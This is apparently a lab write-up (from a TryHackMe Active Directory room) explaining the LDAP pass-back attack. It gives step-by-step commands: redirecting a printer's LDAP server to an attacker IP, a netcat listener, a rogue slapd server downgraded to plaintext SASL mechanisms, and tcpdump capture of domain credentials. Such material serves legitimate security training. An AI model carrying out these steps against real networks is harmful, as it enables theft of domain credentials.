A LDAP pass-back attack is a vulnerability that can occur when an LDAP server is improperly configured to delegate authentication to another LDAP server.
LDAP Pass-back attacks occur when a person gains access to the configuration settings of a device where the LDAP (Lightweight Directory Access Protocol) information is specified. An example of such a device is a network printer with a web interface. Typically, the login information for these device interfaces is left as the default values, like “admin:admin” or “admin:password”. In this case, the LDAP credentials cannot be directly obtained as the password is usually hidden.
In an LDAP Pass-back attack, the attacker changes the IP address or hostname of the LDAP server in the device’s configuration. The attacker sets this information to their own IP and tests the configuration. This causes the device to make an authentication attempt using LDAP to the attacker’s fake device. The attacker intercepts this attempt and obtains the LDAP credentials.
Attack scenario
Let’s consider a scenario where a network printer has a web page without any administrative login. There is a section on the page where the username and password information is already preset, with only the username being visible and the password hidden, and a server option with a default IP address.
The user has the option to change the server information and update the settings by pressing an update button. Once the update button is pressed, “an authentication request is sent to the domain controller to validate the preset LDAP credentials”.
Let’s exploit this:
Alter the server IP address to your own IP then initiate your netcat listener on port 389 for LDAP finally click the update button.
It will show like this when you get connection back.
┌──(arun㉿kali)-[~/AD/AD-THM-Rooms/breachingad]
└─$ nc -lvp 389
listening on [any] 389 ...
10.200.25.201: inverse host lookup failed: Unknown host
connect to [10.50.23.54] from (UNKNOWN) [10.200.25.201] 62165
0�Dc�;
x�
objectclass0�supportedCapabilities
Set up Rogue LDAP Server
Now, we need to set up a rogue LDAP server to capture the credentials.
To install the slapd and LDAP-utils.
sudo apt-get update && sudo apt-get -y install slapd ldap-utils
Set any administrator password.
Next, Start configure the domain
dpkg-reconfigure -p low slapd
1. Omit OpenLDAP server configuration? No
2. DNS domain name: (AD domain name) i.e. testdomain.com
3. Organization name: (AD domain name) i.e. testdomain.com
4. Confrim with you administrator passwd which done by initial configuration.
5. Do you want the database to be removed when slapd is purged? No
6. Move old database files before creating a new database YES
sudo systemctl enable slapd
sudo systemctl start slapd
In order to obtain the clear-text credentials, we must reconfigure our LDAP server to only support the PLAIN and LOGIN authentication methods. To do this, we need to create a new LDIF file with the following information:
#olcSaslSecProps.ldif
dn: cn=config
replace: olcSaslSecProps
olcSaslSecProps: noanonymous,minssf=0,passcred
olcSaslSecProps: specifies the SASL security properties; noanonymous flag disables mechanisms that support anonymous login.
minssf: specifies the minimum acceptable security strength; 0 is for no protection.
Apply the new changes using the ldapmodify command and restart the LDAP server.
sudo ldapmodify -Y EXTERNAL -H ldapi:// -f ./olcSaslSecProps.ldif && sudo service slapd restart
To verify the modification:
ldapsearch -H ldap:// -x -LLL -s base -b "" supportedSASLMechanisms
dn:
supportedSASLMechanisms: PLAIN
supportedSASLMechanisms: LOGIN
Change the server ip on printer webpage then start, Check the following error: “This distinguished name contains invalid syntax”. If you receive this error, then use a tcpdump to capture the credentials.
sudo tcpdump -SX -i breachad tcp port 389
Fully examine the tcpdump results and search for the password, which should be present in plaintext.
Thank you! keep learning 😉